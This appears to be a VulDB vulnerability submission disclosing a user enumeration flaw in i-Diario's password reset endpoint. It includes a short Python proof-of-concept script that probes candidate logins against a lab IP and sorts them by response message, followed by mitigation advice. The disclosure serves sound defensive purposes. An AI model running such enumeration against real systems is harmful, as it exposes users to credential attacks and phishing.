| Title | i-diario i-diario Password Reset Functionality 2.9 i-diario Password Reset Functionality |
|---|
| Description | Description
Summary
A user enumeration vulnerability was identified in the "Forgot Password" functionality. The system responds differently depending on whether the submitted username exists, allowing an attacker to enumerate valid user accounts. This may assist in targeted brute-force attacks or social engineering campaigns.
Details
When submitting a POST request to the endpoint /password/email, the system returns different responses based on whether the provided login parameter corresponds to an existing user.
For example:
If the user exists: the response contains a message such as "A password reset link has been sent".
If the user does not exist: the response contains a message like "We couldn't find a user with that login".
This behavior allows an attacker to determine which usernames are valid by simply automating requests with different inputs. The vulnerability arises from a lack of uniform response for valid and invalid accounts during the password recovery process.
PoC (Proof of Concept)
A Python script was created to demonstrate this issue:
import requests
url = "http://192.168.100.226/password/email"
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"Origin": "http://192.168.100.226",
"Referer": "http://192.168.100.226/password/reset"
}
logins = ["admin", "jose", "maria", "professor", "aluno1"]
for login in logins:
response = requests.post(url, data={"login": login}, headers=headers)
if "enviado" in response.text.lower():
print(f"[+] {login} -> EXISTE")
elif "não encontramos" in response.text.lower():
print(f"[-] {login} -> NÃO EXISTE")
This script was able to confirm which users are registered in the system based on the system's response content.
Impact
Type of vulnerability: User Enumeration
Risk: Information disclosure
Impact: Allows an unauthenticated attacker to enumerate valid user accounts, which can be used to:
Launch brute-force or credential stuffing attacks
Perform targeted phishing/social engineering campaigns
Affected: Any user registered in the system
Recommendation
To mitigate this issue:
Return a generic and identical message regardless of whether the user exists (e.g., "If the email is registered, a reset link will be sent.").
Optionally, implement rate limiting and CAPTCHA on the password recovery endpoint to deter automated attacks. |
|---|
| Source | ⚠️ https://www.linkedin.com/in/vanderlei-princival/?originalSubdomain=br |
|---|
| User | princival (UID 88631) |
|---|
| Submission | 08/03/2025 18:58 (11 months ago) |
|---|
| Moderation | 08/17/2025 22:38 (14 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 320431 [Portabilis i-Diario up to 1.5.0 Password Recovery Endpoint /password/email response discrepancy] |
|---|
| Points | 20 |
|---|